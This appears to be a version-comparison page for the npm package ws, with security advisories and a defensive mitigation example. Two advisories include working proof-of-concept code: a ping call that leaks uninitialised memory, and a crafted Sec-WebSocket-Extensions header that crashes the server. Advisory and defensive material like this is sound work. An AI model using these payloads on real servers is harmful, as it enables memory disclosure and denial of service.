The npm package ws, a popular choice for WebSocket communication in Node.js, saw a notable update from version 0.4.32 to 0.5.0. While maintaining its core promise of a fast, RFC-6455 compliant solution, the update introduced several changes relevant to developers.
One key difference lies in the listed dependencies. Version 0.5.0 replaces commander and tinycolor in its dependencies with ultron, and moves **nan** to a new major version range, 1.4.x. These dependency adjustments may affect compatibility with existing projects, so careful consideration is recommended when upgrading. The **nan** update suggests improvements or fixes concerning native Node.js addons.
The development dependencies are also subtly altered. Notably, the **should** library jumps from 1.2.x to 4.3.x. This indicates updates to the testing suite, which in turn suggests more rigorous testing of the core functionality of the package.
The update was released in November 2014, about three months after version 0.4.32. Developers should evaluate these changes in light of their project's requirements, paying close attention to the updated dependencies and development tools to ensure a smooth transition and benefit from any performance enhancements or bug fixes included in the newer version. The changes could affect integration and testing processes and also influence the selection of related libraries and tools within a project.
All the vulnerabilities related to version 0.5.0 of the package:

**Remote Memory Disclosure in ws**

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability. In certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
```javascript
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  // A numeric argument is treated as a length: affected versions allocate
  // a buffer of that size without zero-filling it and send it as the ping payload.
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes
  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client: the echoed, uninitialised bytes.
  })
})
```
Update to version 1.0.1 or greater.
**DoS due to excessively large websocket message in ws**

Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.

Update to version 1.1.1 or later. Alternatively, set the `maxPayload` option for the ws server to a value smaller than 256MB.
**Denial of Service in ws**

Affected versions of ws can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.
```javascript
const WebSocket = require('ws');
const net = require('net');

// Start a server and, once it is listening, open a raw TCP connection to it
// and send a hand-built upgrade request whose extensions header uses an
// Object.prototype property name as the extension name.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n' // joined with the separator below, this terminates the header block
  ].join('\r\n');
  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```
Update to version 3.3.1 or later.
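As an added example (not code from the ws project or from the advisories above), the following shows the two server-side mitigations that the last two entries describe: a parser-level check that rejects an upgrade whose `Sec-WebSocket-Extensions` header names an `Object.prototype` property, and a `maxPayload` cap. It assumes a ws release that supports the `maxPayload` and `verifyClient` server options; the 1 MiB limit is a constructed value, not a recommendation from the page.

```javascript
// Added example: defensive pre-check of the Sec-WebSocket-Extensions header
// plus hardened server options. Not part of the ws project.

// Own property names of Object.prototype; using one of these as a key in a
// plain object is what the crash described above relies on.
const PROTO_NAMES = new Set(Object.getOwnPropertyNames(Object.prototype));

// Walk the header following the RFC 6455 grammar (extensions separated by
// ",", parameters by ";", optional "=value") and collect every extension or
// parameter name that collides with Object.prototype. Empty elements, as in
// ",;constructor", are skipped rather than treated as names.
function findPrototypeNames(header) {
  const bad = [];
  if (typeof header !== 'string') return bad; // header absent: nothing to reject
  for (const ext of header.split(',')) {
    for (const part of ext.split(';')) {
      const trimmed = part.trim();
      if (trimmed === '') continue;
      const name = trimmed.split('=')[0].trim();
      if (PROTO_NAMES.has(name)) bad.push(name);
    }
  }
  return bad;
}

function isSafeExtensionsHeader(header) {
  return findPrototypeNames(header).length === 0;
}

// Hardened options for `new WebSocket.Server(serverOptions(port))`:
// - maxPayload caps incoming message size (the advisory asks for < 256MB;
//   1 MiB here is a constructed value, size it for your application);
// - verifyClient runs before ws parses the extensions header and refuses the
//   upgrade when the header would poison a plain-object lookup.
function serverOptions(port) {
  return {
    port,
    maxPayload: 1024 * 1024,
    verifyClient: (info) =>
      isSafeExtensionsHeader(info.req.headers['sec-websocket-extensions']),
  };
}

module.exports = { findPrototypeNames, isSafeExtensionsHeader, serverOptions };
```

Rejected upgrades surface as a 401 from `verifyClient`, so counting them at the reverse proxy or in application logs gives a cheap detection signal for probing of this bug.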